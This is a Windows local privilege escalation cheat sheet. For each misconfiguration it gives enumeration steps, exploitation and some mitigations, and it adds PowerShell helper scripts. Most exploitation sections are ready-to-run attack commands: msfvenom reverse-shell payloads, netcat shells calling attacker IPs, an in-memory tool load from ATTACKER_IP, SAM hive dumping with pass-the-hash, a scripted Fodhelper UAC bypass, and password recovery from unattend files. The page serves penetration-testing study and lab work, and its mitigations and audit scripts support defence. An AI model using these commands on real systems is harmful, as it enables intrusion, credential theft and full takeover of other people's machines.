Windows Local Privilege Escalation
🛠️ Under Construction
Useful Tools
In the following table, some popular and useful tools for Windows local privilege escalation are presented:
| Name | Language | Author | Description |
|---|---|---|---|
| SharpUp | C# | @harmj0y | SharpUp is a C# port of various PowerUp functionality |
| PowerUp | PowerShell | @harmj0y | PowerUp aims to be a clearinghouse of common Windows privilege escalation |
| Privesc | PowerShell | enjoiz | Windows PowerShell script that finds misconfiguration issues which can lead to privilege escalation |
| WinPEAS | C# | @hacktricks_live | Windows Privilege Escalation Awesome Script |
| PrivescCheck | PowerShell | @itm4n | Privilege Escalation Enumeration Script for Windows |
AlwaysInstallElevated
Manual Enumeration
$ reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
$ reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Tool Enumeration
$ SharpUp.exe audit AlwaysInstallElevated
Exploitation
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.15 LPORT=9001 -f msi > backdoor.msi
on victim (as the low-privileged user; the MSI installs as SYSTEM only when the value is 1 in both hives):
$ msiexec /quiet /qn /i backdoor.msi
Mitigation
To mitigate AlwaysInstallElevated, set the AlwaysInstallElevated value to 0 (or delete it) in both the HKEY_LOCAL_MACHINE and HKEY_CURRENT_USER hives; the setting is only active when both are 1, so a hit in HKLM alone is not exploitable.
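The check below is an added example (not code from the original page): it reads both hives defensively, treating a missing key or value as "not set", and only reports the host as exploitable when both values are 1. This is the condition msiexec actually honours, and the one tools sometimes get wrong by alerting on HKLM alone.

```powershell
# Added example: AlwaysInstallElevated is only honoured when the DWORD is 1 in BOTH hives.
function Test-AlwaysInstallElevated {
    $paths = @{
        HKLM = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
        HKCU = 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    }
    $state = @{}
    foreach ($hive in $paths.Keys) {
        # A missing key or a missing value both mean the default (0), so read without erroring.
        $item = Get-ItemProperty -Path $paths[$hive] -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        $state[$hive] = if ($null -ne $item) { [int]$item.AlwaysInstallElevated } else { 0 }
    }
    [pscustomobject]@{
        HKLM        = $state.HKLM
        HKCU        = $state.HKCU
        Exploitable = ($state.HKLM -eq 1 -and $state.HKCU -eq 1)
    }
}

$result = Test-AlwaysInstallElevated
$result
if ($result.Exploitable) {
    # Any .msi the low-privileged user can place on disk now installs as SYSTEM.
    Write-Host '[+] AlwaysInstallElevated is set in both hives: msiexec /quiet /qn /i <your.msi> runs as SYSTEM'
}
```

Run it as the low-privileged user you are escalating from; the HKCU half is evaluated in that user's hive, which is why the check must not be run from an administrator's session.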
Answer files (Unattend files)
Manual Enumeration
$ Write-Host `n;foreach ($file in @('C:\Windows\Panther\unattend.xml', 'C:\Windows\Panther\Unattend\unattend.xml', 'C:\Windows\System32\Sysprep\unattend.xml', 'C:\Windows\System32\Sysprep\sysprep.xml', 'C:\Windows\System32\Sysprep\Panther\unattend.xml', 'C:\Windows\sysprep.inf', 'C:\Windows\unattend.xml', 'C:\unattend.xml', 'C:\sysprep.inf')) { if (Test-Path $file) { Write-Host "[+] $file" } }; Write-Host `n
Tool Enumeration
$ SharpUp.exe audit UnattendedInstallFiles
Exploitation
1- Read the content of the found answer file:
$ type C:\Windows\Panther\Unattend\Unattend.xml
2- Decode the base64 password field. Values written by Windows System Image Manager with <PlainText>false</PlainText> are the UTF-16LE password with the element name appended ("Password" for AutoLogon and LocalAccount entries, "AdministratorPassword" for that element), so strip the NUL bytes and the trailing suffix; hand-made lab files often use plain ASCII base64 instead:
$ echo "<base64 string>" | base64 -d | tr -d '\0'
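As an added example (not from the original page), the parser below walks an unattend.xml, pulls every AutoLogon, LocalAccount and AdministratorPassword value, and decodes it according to the rule Microsoft documents for Windows System Image Manager: the password is base64 of the UTF-16LE string with the element name appended. Because many lab images are hand-written with ASCII base64, the decoder detects the encoding from the byte pattern instead of assuming one. The XML embedded at the bottom is constructed sample input, not a real host's file; the on-disk paths it then scans are the ones listed in the enumeration one-liner above.

```powershell
# Added example: recover passwords from answer files, handling both encodings and the suffix.
function ConvertFrom-UnattendPassword {
    param([Parameter(Mandatory)][string]$Base64, [Parameter(Mandatory)][string]$ElementName)
    $bytes = [Convert]::FromBase64String($Base64)
    # UTF-16LE text made of ASCII characters has 0x00 in every odd byte position.
    $isUtf16 = ($bytes.Length -ge 2) -and ($bytes.Length % 2 -eq 0)
    for ($i = 1; $isUtf16 -and $i -lt $bytes.Length; $i += 2) { if ($bytes[$i] -ne 0) { $isUtf16 = $false } }
    $text = if ($isUtf16) { [Text.Encoding]::Unicode.GetString($bytes) } else { [Text.Encoding]::UTF8.GetString($bytes) }
    # Windows SIM appends the element name ("Password" / "AdministratorPassword") before encoding.
    if ($text.EndsWith($ElementName)) { $text = $text.Substring(0, $text.Length - $ElementName.Length) }
    return $text
}

function Get-UnattendCredential {
    param([Parameter(Mandatory)][xml]$Document, [string]$Source = '<inline>')
    foreach ($tag in 'Password', 'AdministratorPassword') {
        foreach ($node in $Document.GetElementsByTagName($tag)) {
            # local-name() sidesteps the urn:schemas-microsoft-com:unattend default namespace.
            $valueNode = $node.SelectSingleNode("*[local-name()='Value']")
            if ($null -eq $valueNode) { continue }      # e.g. a bare <Password> under domain-join credentials
            $plainNode = $node.SelectSingleNode("*[local-name()='PlainText']")
            $plain     = ($null -ne $plainNode) -and ($plainNode.InnerText -eq 'true')
            $userNode  = $node.ParentNode.SelectSingleNode("*[local-name()='Username'] | *[local-name()='Name']")
            [pscustomobject]@{
                Source   = $Source
                Element  = $node.ParentNode.Name + '/' + $tag
                User     = if ($userNode) { $userNode.InnerText } else { 'Administrator' }
                Password = if ($plain) { $valueNode.InnerText } else { ConvertFrom-UnattendPassword $valueNode.InnerText $tag }
            }
        }
    }
}

# Constructed sample (not from any real host): the AutoLogon value is the UTF-16LE form Windows
# writes ("Passw0rd!" + "Password"); the LocalAccount value is ASCII base64 of "passwordPassword".
[xml]$sample = @"
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Username>Administrator</Username>
        <Password><Value>UABhAHMAcwB3ADAAcgBkACEAUABhAHMAcwB3AG8AcgBkAA==</Value><PlainText>false</PlainText></Password>
      </AutoLogon>
      <UserAccounts>
        <LocalAccounts>
          <LocalAccount>
            <Name>svc_deploy</Name>
            <Password><Value>cGFzc3dvcmRQYXNzd29yZA==</Value><PlainText>false</PlainText></Password>
          </LocalAccount>
        </LocalAccounts>
      </UserAccounts>
    </component>
  </settings>
</unattend>
"@
Get-UnattendCredential -Document $sample | Format-Table -AutoSize   # Passw0rd! for Administrator, password for svc_deploy

# The same parser over the locations checked by the enumeration one-liner.
$paths = 'C:\Windows\Panther\unattend.xml', 'C:\Windows\Panther\Unattend\unattend.xml',
         'C:\Windows\System32\Sysprep\unattend.xml', 'C:\Windows\System32\Sysprep\sysprep.xml',
         'C:\Windows\System32\Sysprep\Panther\unattend.xml', 'C:\Windows\unattend.xml', 'C:\unattend.xml'
foreach ($p in $paths) {
    if (Test-Path -LiteralPath $p) { Get-UnattendCredential -Document ([xml](Get-Content -LiteralPath $p -Raw)) -Source $p }
}
```

Piping a UTF-16LE value through `base64 -d` alone prints the letters interleaved with NUL bytes, which is why the encoding check matters before stripping the suffix.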
Leaked Credentials (GitHub Repository)
$ git log
$ git diff <commit-id-1> <commit-id-2>
$ git show
Leaked Credentials (PowerShell History)
$ type C:\Users\<User>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Every profile you can read has its own copy under C:\Users\<User>\...; for the current session the exact file is given by (Get-PSReadLineOption).HistorySavePath.
Mitigation
$ Clear-Content -Path "C:\Users\<User>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"
Clearing the file only removes what has been recorded so far; PSReadLine keeps appending new commands unless history saving is turned off (the HistorySaveStyle option of Set-PSReadLineOption set to SaveNothing), and secrets should be passed as credential objects rather than typed as literals on the command line.
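The scanner below is an added example (not from the original page) that applies the history check to every profile on the box rather than one file: it collects each user's ConsoleHost_history.txt plus the current session's configured path, then greps the lines for the parameter names and tools that usually carry a secret. The patterns are heuristics of my own choosing, so hits need manual review.

```powershell
# Added example: find command lines that carry secrets in every readable PSReadLine history.
function Find-SecretInPSHistory {
    param([string[]]$Path)
    if (-not $Path) {
        $Path = @(Get-ChildItem -Path 'C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt' -ErrorAction SilentlyContinue |
                  ForEach-Object FullName)
        # The running session may save elsewhere (custom HistorySavePath); include it too.
        $own = (Get-PSReadLineOption -ErrorAction SilentlyContinue).HistorySavePath
        if ($own -and $Path -notcontains $own) { $Path += $own }
    }
    $patterns = @(
        '(?i)-(Password|Credential|Secret|Token|ApiKey)\b',   # parameters that take secrets
        '(?i)ConvertTo-SecureString',                         # inline secure-string creation
        '(?i)\bnet\s+(user|use)\b',                           # net user X pass /add, net use \\srv pass
        '(?i)\b(runas|cmdkey|psexec|schtasks)\b',             # tools commonly fed credentials
        '(?i)(pass(word)?|pwd)\s*[:=]'                        # key=value style
    )
    foreach ($file in $Path) {
        if (-not (Test-Path -LiteralPath $file)) { continue }
        $n = 0
        foreach ($line in Get-Content -LiteralPath $file -ErrorAction SilentlyContinue) {
            $n++
            foreach ($re in $patterns) {
                if ($line -match $re) {
                    [pscustomobject]@{ File = $file; Line = $n; Command = $line.Trim() }
                    break       # one hit per line is enough
                }
            }
        }
    }
}

Find-SecretInPSHistory | Format-Table -AutoSize -Wrap
```

Other users' profiles are normally unreadable to a standard user, so an empty result for them is expected; the value of the scan is in shared or misconfigured accounts and in your own foothold user's history.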
Logon Autostart Execution (Registry Run Keys)
Manual Enumeration
$ reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Tool Enumeration
$ SharpUp.exe audit RegistryAutoruns
Exploitation
$ msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.10.15 lport=9001 -f exe > shell.exe
Rename the malicious exe (shell.exe) to the file name the Run-key entry points at (here 'NCV_AMD64.exe') and place it at that path; this only works when that file or its directory is writable by you.
Open a listener on your Kali machine.
Run-key entries execute in the context of whoever logs on, so the payload runs as Administrator only when an administrator logs in. In the lab, reboot the victim's machine and log in as Administrator:
Mitigation
$ reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "<ValueName>" /f
Deleting the entry removes the trigger; the actual weakness is the writable target binary or directory, so fix its permissions as well.
Logon Autostart Execution (Startup Folder)
Manual Enumeration
$ icacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
Tool Enumeration
$ accesschk.exe /accepteula -uwdq "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
(-d treats the argument as a directory, -w lists only principals with write access, -u and -q suppress errors and the banner.)
Exploitation
$ msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.10.15 lport=9001 -f exe > shell.exe
Move the malicious executable file to 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup' (the all-users Startup folder, which must be writable by you).
Open a listener on your Kali machine.
Everything in this folder runs for each user who logs on, so the shell comes back as Administrator only after an administrator logs in. In the lab, reboot the victim's machine and log in as Administrator:
Mitigation
$ takeown /F "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" /A /R /D Y
$ icacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" /reset /T /C /Q
SeBackupPrivilege
Enumeration
$ whoami /priv
$ SharpUp.exe audit TokenPrivileges
Exploitation
$ mkdir C:\temp
$ reg save hklm\sam C:\temp\sam.hive
$ reg save hklm\system C:\temp\system.hive
Copy both hives to the attacker machine (reg.exe can save SAM because SeBackupPrivilege lets it open the keys with backup semantics), then dump the local hashes and reuse the Administrator hash:
$ impacket-secretsdump -sam sam.hive -system system.hive LOCAL
$ evil-winrm -i <ip> -u "Administrator" -H "<hash>"
SeImpersonatePrivilege
Enumeration
$ whoami /priv
$ SharpUp.exe audit TokenPrivileges
Exploitation
$ PrintSpoofer64.exe -i -c cmd
Potato Family
JuicyPotato
JuicyPotatoNG
JuicyPotatoNG.exe -t * -p C:\windows\system32\cmd.exe -a "/c C:\users\kohsuke\desktop\nc.exe -e cmd.exe 10.10.16.48 9002"
PrintSpoofer
# -c is the command to run; -i interacts with the spawned process in the current console instead of detaching it
PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd"
RoguePotato
c:\RoguePotato.exe -r 10.10.10.10 -e "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -l 9999
# In the current RoguePotato release -e is the command and -c selects the CLSID; some old builds took the listening port with "-f" instead of "-l"
c:\RoguePotato.exe -r 10.10.10.10 -e "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999
# RoguePotato always needs a host you control listening on TCP/135: DCOM only talks to an OXID resolver on port 135, so the victim is pointed (-r) at your redirector, which forwards the request back to the fake resolver RoguePotato runs locally on the -l port.
# On the attacker redirector (listen on TCP/135 and forward to victim:9999):
socat tcp-listen:135,reuseaddr,fork tcp:VICTIM_IP:9999
# On the victim, -r is the redirector IP and -l the local resolver port socat forwards to:
RoguePotato.exe -r REDIRECTOR_IP -e "cmd.exe /c whoami" -l 9999
SharpEfsPotato
SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log"
# we cat the w.log
type C:\temp\w.log
nt authority\system
EfsPotato
# output will be nt authority\system
EfsPotato.exe "whoami"
# If one pipe fails or EDR blocks it, try the other supported pipes:
EfsPotato <cmd> [pipe]
pipe -> lsarpc|efsrpc|samr|lsass|netlogon (default=lsarpc)
GodPotato
# Works across Windows 8/8.1–11 and Server 2012–2022 when SeImpersonatePrivilege is present.
GodPotato -cmd "cmd /c whoami"
# You can achieve a reverse shell like this.
GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
DCOMPotato
# PrinterNotify variant
PrinterNotifyPotato.exe "cmd /c whoami"
# McpManagementService variant (Server 2022 also)
McpManagementPotato.exe "cmd /c whoami"
SigmaPotato
# Load and execute from memory (no disk touch)
[System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("http://ATTACKER_IP/SigmaPotato.exe"))
[SigmaPotato]::Main("cmd /c whoami")
# Or ask it to spawn a PS reverse shell
[SigmaPotato]::Main(@("--revshell","ATTACKER_IP","4444"))
CLSID Problems
# Oftentimes default CLSID that JuicyPotato uses doesn't work
https://ohpe.it/juicy-potato/CLSID/
Checking CLSIDs
# Download Join-Object.ps1 and load it
https://github.com/ohpe/juicy-potato/blob/master/CLSID/utils/Join-Object.ps1
# download and execute
https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1
# test_clsid.bat tries every CLSID from the list in turn; when the port number in its output changes, the CLSID just tried worked.
# Check the working CLSIDs using the parameter -c
https://github.com/ohpe/juicy-potato/blob/master/Test/test_clsid.bat
Stored Credentials (Runas)
Enumeration
$ cmdkey /list
Exploitation
- on attacker:
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.15 LPORT=9001 -f exe > malicious.exe
- on victim (the /user value must match a target shown by cmdkey /list; /savecred makes runas reuse that stored credential without prompting):
$ runas /savecred /user:WORKGROUP\Administrator "C:\Windows\Tasks\malicious.exe"
UAC Bypass
Enumeration
$ reg query HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
Tool Enumeration
$ SharpUp.exe audit
Exploitation
ℹ️ This case study uses a UAC bypass that abuses Fodhelper.exe, an auto-elevating binary that resolves the ms-settings protocol handler from HKCU, so a hijacked handler runs elevated without a prompt. It requires an account that is a member of local Administrators running at medium integrity, and UAC below "Always notify" (ConsentPromptBehaviorAdmin in the key queried above must not be 2).
on attacker:
$ msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.10.15 lport=9001 -f exe > mallicous.exe
on victim:
$ New-Item -Path "HKCU:\Software\Classes\ms-settings\shell\open\command" -Force
$ New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force
$ Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\shell\open\command" -Name "(default)" -Value "powershell -exec bypass -c C:\<full_path>\<binary.exe>" -Force
$ C:\Windows\System32\fodhelper.exe
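The function below is an added example (not from the original page) that wraps the four steps above with the checks a practitioner wants before running them and with the cleanup the page does not show: it confirms the token is a UAC-filtered administrator, reads the UAC prompt level, and removes the HKCU hijack afterwards so the host is not left with a persistent escalation path. The command passed in at the bottom is an assumption; substitute your own payload.

```powershell
# Added example: Fodhelper bypass with preconditions and cleanup.
function Invoke-FodhelperUacBypass {
    param([Parameter(Mandatory)][string]$Command)
    $principal = [Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()
    if ($principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
        Write-Host '[*] Already running with a full administrator token; nothing to bypass.'; return
    }
    # In a UAC-filtered token the Administrators group is present but "used for deny only",
    # which .NET's Groups property hides, so read the raw token group list from whoami.
    if (-not ((whoami /groups) -match 'S-1-5-32-544')) {
        throw 'Not a member of local Administrators; Fodhelper cannot elevate this account.'
    }
    $uac = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    if ($uac.ConsentPromptBehaviorAdmin -eq 2) {
        throw 'UAC is at "Always notify": fodhelper prompts instead of auto-elevating.'
    }
    $key = 'HKCU:\Software\Classes\ms-settings\shell\open\command'
    try {
        # Same hijack as the manual steps: empty DelegateExecute plus our command as the default value.
        New-Item -Path $key -Force | Out-Null
        New-ItemProperty -Path $key -Name 'DelegateExecute' -Value '' -PropertyType String -Force | Out-Null
        Set-ItemProperty -Path $key -Name '(default)' -Value $Command -Force
        # fodhelper.exe auto-elevates and looks up the ms-settings handler in HKCU before HKLM.
        Start-Process -FilePath "$env:windir\System32\fodhelper.exe" -WindowStyle Hidden
        Start-Sleep -Seconds 3          # give the elevated handler time to start our command
    } finally {
        # Always remove the hijack, even if launching failed.
        Remove-Item -Path 'HKCU:\Software\Classes\ms-settings' -Recurse -Force -ErrorAction SilentlyContinue
    }
}

# Assumed payload for the demo: record the elevated token's groups to a world-readable path.
Invoke-FodhelperUacBypass -Command 'cmd.exe /c whoami /groups > C:\Windows\Tasks\elevated.txt'
```

If the output file shows "Mandatory Label\High Mandatory Level" the bypass worked; a missing file with no error usually means an EDR or a newer build blocked the auto-elevation, and the registry key has still been cleaned up by the finally block.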
Unquoted Service Path
Enumeration
$ wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
$ sc qc "Vulnerable Service 1"
$ icacls "C:\Program Files\Vulnerable Service1"
Tool Enumeration
$ SharpUp.exe audit UnquotedServicePath
Exploitation
$ sc query "Vulnerable Service 1"
on attacker:
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.15 LPORT=9001 -f exe > Service.exe
on victim: Windows resolves an unquoted path by trying each space-delimited prefix with .exe appended (C:\Program.exe, then "C:\Program Files\Vulnerable.exe", then the real binary), so the hijack file must be named after one of those prefixes and placed in a directory you can write. In this lab the writable directory is the service's own folder, so the upload replaces the service binary itself:
$ iwr -Uri http://<ip>:<port>/Service.exe -Outfile "C:\Program Files\Vulnerable Service1\Service.exe"
$ sc stop "Vulnerable Service 1"
$ sc start "Vulnerable Service 1"
If you lack SERVICE_STOP/SERVICE_START on the service (check with accesschk or sc sdshow), an auto-start service can still be restarted by rebooting, provided you hold SeShutdownPrivilege.
Weak Registry Permissions
Enumeration
Get-Acl -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Vulnerable Service 4" | fl
reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Vulnerable Service 4"
Tool Enumeration
SharpUp.exe audit ModifiableServiceRegistryKeys
Exploitation
on attacker
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.15 LPORT=9001 -f exe > Service4.exe
nc -lnvp 9001
on victim:
iwr -Uri http://<ip>:<port>/Service4.exe -Outfile C:\Windows\Tasks\Service4.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Vulnerable Service 4" /t REG_EXPAND_SZ /v ImagePath /d "C:\Windows\Tasks\Service4.exe" /f
sc start "Vulnerable Service 4"
Mitigation
Automated Script
# Define the registry key path
$regKey = "HKLM:\SYSTEM\CurrentControlSet\Services\Vulnerable Service 4"
# Get the current ACL (Access Control List) for the registry key
$acl = Get-Acl -Path $regKey
# Specify the account and access rights to be removed
$account = "BUILTIN\Users"
$accessRights = [System.Security.AccessControl.RegistryRights]::FullControl
# Build an Allow rule describing the grant to strip: RemoveAccessRule only removes ACEs of the
# same type as the rule handed to it, so a Deny rule here would remove nothing
$accessRule = New-Object System.Security.AccessControl.RegistryAccessRule($account, $accessRights, "Allow")
# If the grant is inherited from the parent key it cannot be removed directly; break inheritance (keeping copies) first
$acl.SetAccessRuleProtection($true, $true)
# Remove the access rule from the ACL
$acl.RemoveAccessRule($accessRule) | Out-Null
# Set the modified ACL back to the registry key (needs WRITE_DAC on the key, i.e. run elevated)
Set-Acl -Path $regKey -AclObject $acl
# Verify nothing is left for the account
(Get-Acl -Path $regKey).Access | Where-Object { $_.IdentityReference -eq $account }
Weak Service Binary Permissions
Enumeration
icacls "C:\Program Files\CustomSrv2\Service2.exe"
sc qc "Vulnerable Service 2"
Tool Enumeration
$ SharpUp.exe audit ModifiableServiceBinaries
Exploitation
$ sc stop "Vulnerable Service 2"
on attacker:
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.15 LPORT=9001 -f exe > Service2.exe
on victim (back up the original binary first so the service can be restored; the path contains a space and must be quoted):
$ iwr -Uri http://<ip>:<port>/Service2.exe -Outfile "C:\Program Files\CustomSrv2\Service2.exe"
$ sc start "Vulnerable Service 2"
Mitigation
icacls "C:\Program Files\CustomSrv2\Service2.exe" /remove:g BUILTIN\Users
(/remove:g takes only the principal and strips every right granted to it; verify afterwards with icacls that no Write/Modify/Full entry remains for Users, Authenticated Users or Everyone.)
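Every check in the Run-key, Startup-folder, unquoted-service-path, weak-registry and weak-binary sections above asks the same question: can the current user modify the thing Windows will execute as a more privileged principal? The script below is an added example (not from the original page) that answers it once for all five cases. It decides writability from the DACL against the current token's SIDs, expands a command line into the executables Windows would actually try (every space-delimited prefix for an unquoted path), and reports services and autoruns whose target file, parent directory or registry key you can change. The write mask is my own simplification of the relevant FileSystemRights/RegistryRights bits; names such as Find-WeakService are mine, not a tool's.

```powershell
# Added example: one audit for writable autorun and service targets.
# Results reflect the (possibly UAC-filtered) token the script runs under, which is what an attacker holds.

# Bits meaning "can change this object" in BOTH FileSystemRights and RegistryRights:
# 0x2 WriteData/SetValue, 0x40000 ChangePermissions, 0x80000 TakeOwnership, plus the generic
# bits GENERIC_WRITE (0x40000000) and GENERIC_ALL (0x10000000) that inherited ACEs often carry.
$script:WriteMask = 0x500C0002

function Test-WritableByCurrentUser {
    param([Parameter(Mandatory)][string]$Path)
    $id   = [Security.Principal.WindowsIdentity]::GetCurrent()
    $mine = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })
    $acl  = Get-Acl -Path $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return $false }
    $allowed = $false
    foreach ($ace in $acl.Access) {
        try   { $sid = $ace.IdentityReference.Translate([Security.Principal.SecurityIdentifier]).Value }
        catch { continue }                                         # orphaned SID, cannot match us
        if ($mine -notcontains $sid) { continue }
        $rights = if ($null -ne $ace.PSObject.Properties['RegistryRights']) { [int]$ace.RegistryRights } else { [int]$ace.FileSystemRights }
        if (($rights -band $script:WriteMask) -eq 0) { continue }
        if ($ace.AccessControlType -eq 'Deny') { return $false }   # a matching Deny wins
        $allowed = $true
    }
    return $allowed
}

function Get-ExecutableCandidates {
    # Executables Windows may launch for a command line: a quoted path yields one; an unquoted
    # path containing spaces yields every space-delimited prefix CreateProcess tries, in order.
    param([Parameter(Mandatory)][string]$CommandLine)
    $cmd = [Environment]::ExpandEnvironmentVariables($CommandLine.Trim()) -replace '^\\\?\?\\', ''
    if ($cmd.StartsWith('"')) {
        $end = $cmd.IndexOf('"', 1)
        if ($end -gt 1) { return $cmd.Substring(1, $end - 1) } else { return @() }
    }
    $tokens = $cmd -split ' +'
    $out = @()
    for ($i = 1; $i -le $tokens.Count; $i++) {
        $prefix = $tokens[0..($i - 1)] -join ' '
        if ($prefix -match '\.exe$') { $out += $prefix; break }    # real binary reached; rest are arguments
        $out += "$prefix.exe"
    }
    return $out
}

function Test-CandidateWritable {
    # Exploitable if the file exists and is writable, or if it is missing and we can create it
    # in the parent directory (that is where the hijack binary gets planted).
    param([Parameter(Mandatory)][string]$Candidate)
    if (Test-Path -LiteralPath $Candidate -PathType Leaf) { return (Test-WritableByCurrentUser $Candidate) }
    $dir = Split-Path -Path $Candidate -Parent
    return [bool]($dir -and (Test-Path -LiteralPath $dir -PathType Container) -and (Test-WritableByCurrentUser $dir))
}

function Find-WeakService {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        if (-not $svc.PathName) { continue }
        $cands = @(Get-ExecutableCandidates $svc.PathName)
        $hits  = @($cands | Where-Object { Test-CandidateWritable $_ })
        $key   = "HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)"
        $keyOk = Test-WritableByCurrentUser $key                  # SetValue here lets us rewrite ImagePath
        if ($hits.Count -eq 0 -and -not $keyOk) { continue }
        [pscustomobject]@{
            Service        = $svc.Name
            RunsAs         = $svc.StartName
            StartMode      = $svc.StartMode
            UnquotedPath   = ($cands.Count -gt 1)
            WritableTarget = ($hits -join '; ')
            WritableRegKey = $keyOk
        }
    }
}

function Find-WeakAutorun {
    foreach ($k in 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
                   'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce') {
        $props = Get-ItemProperty -Path $k -ErrorAction SilentlyContinue
        if (-not $props) { continue }
        foreach ($p in ($props.PSObject.Properties | Where-Object { $_.Name -notlike 'PS*' })) {
            if (-not $p.Value) { continue }
            $hits = @(@(Get-ExecutableCandidates ([string]$p.Value)) | Where-Object { Test-CandidateWritable $_ })
            if ($hits.Count) { [pscustomobject]@{ Source = "$k : $($p.Name)"; WritableTarget = ($hits -join '; ') } }
        }
    }
    # All-users Startup folder: anything dropped here runs for every user who logs on, admins included.
    $startup = Join-Path $env:ProgramData 'Microsoft\Windows\Start Menu\Programs\Startup'
    if (Test-WritableByCurrentUser $startup) { [pscustomobject]@{ Source = $startup; WritableTarget = '(directory)' } }
}

Find-WeakAutorun | Format-Table -AutoSize -Wrap
Find-WeakService | Format-Table -AutoSize -Wrap
```

A service row with UnquotedPath true and a WritableTarget that is not the service's own binary is the classic unquoted-path hijack; a WritableTarget equal to the binary is the weak-binary case; WritableRegKey true means the ImagePath value can be pointed at your payload. In all three the shell comes back as RunsAs, which is LocalSystem for most misconfigured services.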